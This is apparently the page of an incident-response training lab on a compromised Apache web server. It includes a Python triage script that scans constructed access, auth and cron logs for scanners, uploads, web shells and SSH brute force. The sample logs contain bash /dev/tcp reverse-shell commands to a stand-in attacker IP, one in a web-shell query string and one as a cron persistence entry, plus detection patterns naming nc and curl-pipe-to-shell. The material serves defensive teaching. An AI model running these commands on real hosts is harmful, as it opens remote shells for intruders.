⚠ IDS ALERT — WEB SERVER COMPROMISE — webserver-01
IR-07
INCIDENT RESPONSE — WEB SERVER COMPROMISE
FILE UPLOAD EXPLOIT · WEB SHELL · REVERSE SHELL · CRON PERSISTENCE

OBJECTIVES

Read the incident ticket
Find the attacker's IP in access logs
Identify the vulnerability exploited
Find the web shell filename
View the web shell source code
Find the SSH brute-force in auth logs
Identify the persistence mechanism
Look up attacker IP in threat intel
Run terminal investigation commands
Submit the IR report
TOOL PANELS: Apache Access Log · File System · Auth Log · Cron Inspector · Threat Intel · Terminal · Notepad · IR Report
PHASE 1 — TRIAGE
INCIDENT BRIEF
⚠ IDS ALERT — TICKET #IR-2026-0512

WEB SERVER COMPROMISE

HOST: webserver-01 · 192.168.10.5 · 07:22 UTC

INCIDENT SUMMARY

The IDS fired at 07:22 UTC, flagging unusual outbound traffic from webserver-01, the company's public-facing Apache web server. A junior admin noticed an unknown file in the web root and escalated the alert. The server hosts the company's customer portal on Ubuntu 22.04 with Apache 2.4.

SERVER DETAILS

Property       Value
Hostname       webserver-01
Internal IP    192.168.10.5
Public IP      203.0.113.15
OS             Ubuntu 22.04 LTS
Web Server     Apache 2.4.52
Web Root       /var/www/html/

INITIAL OBSERVATIONS

  • Unknown PHP file found in /var/www/html/uploads/
  • Outbound connection to unknown external IP on port 4444
  • CPU spike between 06:40–07:10 UTC
  • Multiple SSH failures in auth log overnight

YOUR TASKS

  • Search Apache access logs for scanner activity, file uploads, and web shell usage
  • Browse the file system to find and inspect the web shell
  • Review auth logs for SSH brute-force activity
  • Check cron jobs for persistence
  • Look up the attacker IP in threat intel
  • Run terminal investigation commands
  • Complete the IR Report
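The task list above is a procedure: pull scanner, upload and web-shell activity out of the Apache log, find the SSH brute force in auth.log, and check cron for a reverse-shell callback. The script below is an added example of that triage logic, not part of the lab's own terminal or tooling. The access.log, auth.log and crontab lines it runs over are constructed for illustration, and the attacker IP 198.51.100.23, the file name avatar.php and the upload endpoint /upload.php are assumptions, not findings from the lab data; the real artifacts are what the tool panels expose.

```python
"""Triage helpers for the webserver-01 investigation steps.

Added example; the sample artifacts below are constructed, and the
attacker IP / filenames in them are assumptions, not lab findings.
"""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed Apache combined-format lines (not the lab's real access.log).
ACCESS_LOG = """\
198.51.100.23 - - [08/May/2026:06:31:02 +0000] "GET /wp-login.php HTTP/1.1" 404 196 "-" "Nikto/2.1.6"
198.51.100.23 - - [08/May/2026:06:31:03 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 196 "-" "Nikto/2.1.6"
192.168.10.44 - - [08/May/2026:06:33:10 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [08/May/2026:06:38:41 +0000] "POST /upload.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.23 - - [08/May/2026:06:39:05 +0000] "GET /uploads/avatar.php?cmd=id HTTP/1.1" 200 87 "-" "Mozilla/5.0"
198.51.100.23 - - [08/May/2026:06:40:12 +0000] "GET /uploads/avatar.php?cmd=bash+-c+%27bash+-i+%3E%26+/dev/tcp/198.51.100.23/4444+0%3E%261%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Constructed auth.log lines (not the lab's real auth.log).
AUTH_LOG = """\
May  8 02:14:01 webserver-01 sshd[2201]: Failed password for root from 198.51.100.23 port 51012 ssh2
May  8 02:14:03 webserver-01 sshd[2203]: Failed password for root from 198.51.100.23 port 51014 ssh2
May  8 02:14:05 webserver-01 sshd[2205]: Failed password for invalid user admin from 198.51.100.23 port 51016 ssh2
May  8 02:14:07 webserver-01 sshd[2207]: Failed password for invalid user ubuntu from 198.51.100.23 port 51018 ssh2
May  8 02:14:09 webserver-01 sshd[2209]: Failed password for root from 198.51.100.23 port 51020 ssh2
May  8 06:55:30 webserver-01 sshd[2410]: Accepted publickey for analyst from 192.168.10.44 port 40022 ssh2
"""

# Constructed crontab (not the lab's real cron data).
CRONTAB = """\
# m h dom mon dow command
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.23/4444 0>&1'
0 3 * * * /usr/bin/certbot renew --quiet
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "(?P<ua>[^"]*)"')
SCANNER_UA = re.compile(r'nikto|sqlmap|nmap|masscan|dirbuster|gobuster|wpscan', re.I)
REVSHELL_RE = re.compile(r'/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d+)')
CRON_SUSPECT = re.compile(r'/dev/tcp/|\bn?cat?\b|\bnc\b|base64 -d|(?:curl|wget) [^|]*\|\s*(?:ba)?sh')

def parse_access(text):
    """Parse combined-format lines; URL-decode the path so shell payloads read plainly."""
    out = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if m:
            e = m.groupdict()
            e["status"] = int(e["status"])
            e["path"] = unquote(e["path"])
            out.append(e)
    return out

def scanner_ips(entries, min_404=2):
    """IPs with a known scanner User-Agent or a burst of 404s (forced browsing)."""
    by_ua = {e["ip"] for e in entries if SCANNER_UA.search(e["ua"])}
    not_found = Counter(e["ip"] for e in entries if e["status"] == 404)
    return by_ua | {ip for ip, n in not_found.items() if n >= min_404}

def file_uploads(entries):
    """POSTs to an upload endpoint: the initial-access candidates."""
    return [e for e in entries if e["method"] == "POST" and "upload" in e["path"].lower()]

def webshell_hits(entries):
    """PHP under /uploads/ executed with a query string: web-shell usage.
    Returns (sorted shell filenames, matching entries)."""
    hits = [e for e in entries if re.match(r'^/uploads/[^?]+\.php\?', e["path"])]
    names = sorted({re.match(r'^/uploads/([^?]+)', e["path"]).group(1) for e in hits})
    return names, hits

def ssh_bruteforce(text, threshold=5):
    """Source IPs with at least `threshold` failed password attempts."""
    fails = Counter()
    for line in text.splitlines():
        m = re.search(r'Failed password for (?:invalid user )?\S+ from (\S+) port', line)
        if m:
            fails[m.group(1)] += 1
    return {ip: n for ip, n in fails.items() if n >= threshold}

def suspicious_cron(text):
    """Non-comment cron lines carrying reverse-shell or download-and-run patterns."""
    return [l for l in text.splitlines() if not l.startswith("#") and CRON_SUSPECT.search(l)]

def reverse_shell_targets(*texts):
    """Every ip:port named in a bash /dev/tcp reverse shell across the artifacts."""
    found = set()
    for t in texts:
        for ip, port in REVSHELL_RE.findall(unquote(t)):
            found.add(f"{ip}:{port}")
    return sorted(found)

def triage():
    """Run every step of the task list and collect the IOCs for the IR report."""
    entries = parse_access(ACCESS_LOG)
    shells, _ = webshell_hits(entries)
    return {
        "scanner_ips": sorted(scanner_ips(entries)),
        "upload_ips": sorted({e["ip"] for e in file_uploads(entries)}),
        "web_shells": shells,
        "ssh_bruteforce": ssh_bruteforce(AUTH_LOG),
        "cron_persistence": suspicious_cron(CRONTAB),
        "c2": reverse_shell_targets(ACCESS_LOG, CRONTAB),
    }

if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

On a live host the same checks are what the terminal step amounts to: the web-shell request carries the reverse-shell command in its query string, so decoding the path ties the port-4444 connection in the IDS alert back to a specific request, and matching the /dev/tcp target in both the access log and the crontab shows that the cron entry is the persistence for the same callback rather than an unrelated job.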
APACHE ACCESS LOG — /var/log/apache2/access.log — 2026-05-08
Columns: IP · Time · Method · Path · Code · Bytes
FILE SYSTEM — webserver-01 — /var/www/html/
Columns: Name · Perms · Modified · Size · Owner
AUTH LOG — /var/log/auth.log — 2026-05-08
Columns: Time · Host · Service · Message
CRON INSPECTOR — webserver-01
THREAT INTELLIGENCE — IOC LOOKUP
LOOK UP IP, DOMAIN, OR FILE HASH
Enter the attacker's IP or file hash found in your investigation.
TERMINAL — analyst@webserver-01:~$
analyst@webserver-01:~$ # Connected via secure channel
analyst@webserver-01:~$ # Type "help" for available commands
analyst@webserver-01:~$
NOTEPAD — IR SCRATCHPAD
IR REPORT — TICKET #IR-2026-0512
INITIAL ACCESS
POST-EXPLOITATION
SCOPE & SEVERITY